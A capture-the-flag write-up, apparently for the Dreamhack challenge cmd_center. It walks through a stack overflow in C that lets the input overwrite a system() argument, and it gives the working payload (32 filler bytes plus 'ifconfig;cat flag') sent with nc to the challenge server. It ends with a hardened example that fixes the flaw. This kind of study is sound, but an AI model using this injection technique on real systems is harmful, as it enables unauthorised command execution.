Like the previous problem, this one feels like a bit of a breather.
(Honestly, I had forgotten that there was a problem file at all and was just connecting to the server and throwing random commands at it... there was no response whatsoever, and I was thinking "how are we supposed to solve a problem built like this?"...)
First, let's look at the code.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void init() {
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
}

int main()
{
    char cmd_ip[256] = "ifconfig";
    int dummy;
    char center_name[24];

    init();
    printf("Center name: ");
    read(0, center_name, 100);          /* 100 bytes into a 24-byte buffer */
    if( !strncmp(cmd_ip, "ifconfig", 8)) {  /* only the first 8 bytes are checked */
        system(cmd_ip);
    }
    else {
        printf("Something is wrong!\n");
    }
    exit(0);
}
Tearing it open with gdb:
gef➤ disas main
Dump of assembler code for function main:
0x00000000000008ad <+0>: push %rbp
0x00000000000008ae <+1>: mov %rsp,%rbp
0x00000000000008b1 <+4>: sub $0x130,%rsp
0x00000000000008b8 <+11>: mov %fs:0x28,%rax
0x00000000000008c1 <+20>: mov %rax,-0x8(%rbp)
0x00000000000008c5 <+24>: xor %eax,%eax
0x00000000000008c7 <+26>: movabs $0x6769666e6f636669,%rax
0x00000000000008d1 <+36>: mov $0x0,%edx
0x00000000000008d6 <+41>: mov %rax,-0x110(%rbp)
0x00000000000008dd <+48>: mov %rdx,-0x108(%rbp)
0x00000000000008e4 <+55>: lea -0x100(%rbp),%rdx
0x00000000000008eb <+62>: mov $0x0,%eax
0x00000000000008f0 <+67>: mov $0x1e,%ecx
0x00000000000008f5 <+72>: mov %rdx,%rdi
0x00000000000008f8 <+75>: rep stos %rax,%es:(%rdi)
0x00000000000008fb <+78>: mov $0x0,%eax
0x0000000000000900 <+83>: call 0x86a <init>
0x0000000000000905 <+88>: lea 0xf8(%rip),%rdi # 0xa04
0x000000000000090c <+95>: mov $0x0,%eax
0x0000000000000911 <+100>: call 0x710 <printf@plt>
0x0000000000000916 <+105>: lea -0x130(%rbp),%rax
0x000000000000091d <+112>: mov $0x64,%edx
0x0000000000000922 <+117>: mov %rax,%rsi
0x0000000000000925 <+120>: mov $0x0,%edi
0x000000000000092a <+125>: call 0x720 <read@plt>
0x000000000000092f <+130>: lea -0x110(%rbp),%rax
0x0000000000000936 <+137>: mov $0x8,%edx
0x000000000000093b <+142>: lea 0xd0(%rip),%rsi # 0xa12
0x0000000000000942 <+149>: mov %rax,%rdi
0x0000000000000945 <+152>: call 0x6e0 <strncmp@plt>
0x000000000000094a <+157>: test %eax,%eax
0x000000000000094c <+159>: jne 0x95f <main+178>
0x000000000000094e <+161>: lea -0x110(%rbp),%rax
0x0000000000000955 <+168>: mov %rax,%rdi
0x0000000000000958 <+171>: call 0x700 <system@plt>
0x000000000000095d <+176>: jmp 0x96b <main+190>
0x000000000000095f <+178>: lea 0xb5(%rip),%rdi # 0xa1b
0x0000000000000966 <+185>: call 0x6f0 <puts@plt>
0x000000000000096b <+190>: mov $0x0,%edi
0x0000000000000970 <+195>: call 0x740 <exit@plt>
End of assembler dump.
The important parts are as follows.
First, read() takes 0x64 (100) bytes into $rbp - 0x130:
...
0x0000000000000916 <+105>: lea -0x130(%rbp),%rax
0x000000000000091d <+112>: mov $0x64,%edx
0x0000000000000922 <+117>: mov %rax,%rsi
0x0000000000000925 <+120>: mov $0x0,%edi
0x000000000000092a <+125>: call 0x720 <read@plt>
...
Then 8 bytes at $rbp - 0x110 are compared against the string at $rip + 0xd0 (the "ifconfig" literal):
...
0x000000000000092f <+130>: lea -0x110(%rbp),%rax
0x0000000000000936 <+137>: mov $0x8,%edx
0x000000000000093b <+142>: lea 0xd0(%rip),%rsi # 0xa12
0x0000000000000942 <+149>: mov %rax,%rdi
0x0000000000000945 <+152>: call 0x6e0 <strncmp@plt>
...
If they differ (strncmp returns non-zero), jne jumps to main+178, prints the error message and exits; if they match, execution falls through to main+161, runs the system() call and then exits.
0x000000000000094a <+157>: test %eax,%eax
0x000000000000094c <+159>: jne 0x95f <main+178>
0x000000000000094e <+161>: lea -0x110(%rbp),%rax
0x0000000000000955 <+168>: mov %rax,%rdi
0x0000000000000958 <+171>: call 0x700 <system@plt>
0x000000000000095d <+176>: jmp 0x96b <main+190>
0x000000000000095f <+178>: lea 0xb5(%rip),%rdi # 0xa1b
0x0000000000000966 <+185>: call 0x6f0 <puts@plt>
0x000000000000096b <+190>: mov $0x0,%edi
0x0000000000000970 <+195>: call 0x740 <exit@plt>
center_name sits at $rbp - 0x130 and cmd_ip at $rbp - 0x110, so the first 0x20 bytes of input fill center_name (plus the padding after it) before the write reaches cmd_ip. The payload is therefore 0x20 bytes of dummy + ifconfig + command.
Personally, I used ; to chain the command that runs afterwards, and read the file with cat flag instead of spawning a shell.
┌──(kali㉿kali)-[~/Downloads]
└─$ nc host3.dreamhack.games 16202
Center name: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaifconfig;cat flag
DH{----------#flag redacted}
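To make the two weaknesses concrete from the defender's side, here is an added example (my own code, not the challenge's source). It models the frame layout taken from the disassembly (center_name at $rbp - 0x130, cmd_ip at $rbp - 0x110, i.e. cmd_ip starts 0x20 bytes after center_name; the 4 bytes of compiler padding between dummy and cmd_ip are an assumption that makes the offsets match) and contrasts the challenge's unbounded read and 8-byte prefix compare with a bounded read and an exact compare. The sample input is constructed for the example.

```c
/* Added example: frame-layout model of cmd_center, vulnerable vs hardened.
 * Not the challenge's code; struct padding is assumed to reproduce the
 * 0x20-byte distance between center_name and cmd_ip seen in the disassembly. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct frame {
    char center_name[24];   /* $rbp - 0x130 */
    int  dummy;
    char align[4];          /* assumed compiler padding */
    char cmd_ip[256];       /* $rbp - 0x110 */
};

#define READ_LEN 100        /* the challenge reads 100 bytes into 24 */

/* Constructed sample: 32 filler bytes reach cmd_ip, then a longer string
 * that still begins with "ifconfig". */
static const char SAMPLE_INPUT[] =
    "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "ifconfig;extra";
#define SAMPLE_LEN (sizeof SAMPLE_INPUT - 1)

static void frame_init(struct frame *f) {
    memset(f, 0, sizeof *f);
    strcpy(f->cmd_ip, "ifconfig");
}

/* Mirrors read(0, center_name, 100): up to 100 bytes are written starting at
 * center_name with no regard for its 24-byte size, so bytes 0x20.. land in
 * cmd_ip. The byte loop makes the write into the enclosing frame explicit. */
size_t vulnerable_fill(struct frame *f, const char *in, size_t len) {
    unsigned char *base = (unsigned char *)f + offsetof(struct frame, center_name);
    size_t n = len < READ_LEN ? len : READ_LEN;
    for (size_t i = 0; i < n; i++)
        base[i] = (unsigned char)in[i];
    return n;
}

/* Hardened: never accept more than the buffer holds, and NUL-terminate. */
size_t hardened_fill(struct frame *f, const char *in, size_t len) {
    size_t cap = sizeof f->center_name - 1;
    size_t n = len < cap ? len : cap;
    memcpy(f->center_name, in, n);
    f->center_name[n] = '\0';
    return n;
}

/* The challenge's strncmp(cmd_ip, "ifconfig", 8): a prefix check only. */
int prefix_check(const struct frame *f) {
    return strncmp(f->cmd_ip, "ifconfig", 8) == 0;
}

/* Exact match: anything appended after "ifconfig" fails. */
int exact_check(const struct frame *f) {
    return strcmp(f->cmd_ip, "ifconfig") == 0;
}

typedef size_t (*fill_fn)(struct frame *, const char *, size_t);

/* 1 if cmd_ip still reads exactly "ifconfig" after the given fill. */
int cmd_intact_after(fill_fn fill, const char *in, size_t len) {
    struct frame f;
    frame_init(&f);
    fill(&f, in, len);
    return exact_check(&f);
}

/* 1 if the challenge's prefix check would still pass after the given fill. */
int prefix_passes_after(fill_fn fill, const char *in, size_t len) {
    struct frame f;
    frame_init(&f);
    fill(&f, in, len);
    return prefix_check(&f);
}

int main(void) {
    printf("vulnerable fill: cmd_ip intact=%d, prefix check passes=%d\n",
           cmd_intact_after(vulnerable_fill, SAMPLE_INPUT, SAMPLE_LEN),
           prefix_passes_after(vulnerable_fill, SAMPLE_INPUT, SAMPLE_LEN));
    printf("hardened fill:   cmd_ip intact=%d, prefix check passes=%d\n",
           cmd_intact_after(hardened_fill, SAMPLE_INPUT, SAMPLE_LEN),
           prefix_passes_after(hardened_fill, SAMPLE_INPUT, SAMPLE_LEN));
    return 0;
}
```

With the unbounded fill, cmd_ip no longer equals "ifconfig" yet the 8-byte prefix check still passes, which is exactly the gap the write-up exploits; with the bounded fill, cmd_ip is untouched. Either fix alone closes this path: a read bounded by sizeof(center_name), or comparing the whole string (better still, not passing a stack buffer to system() at all).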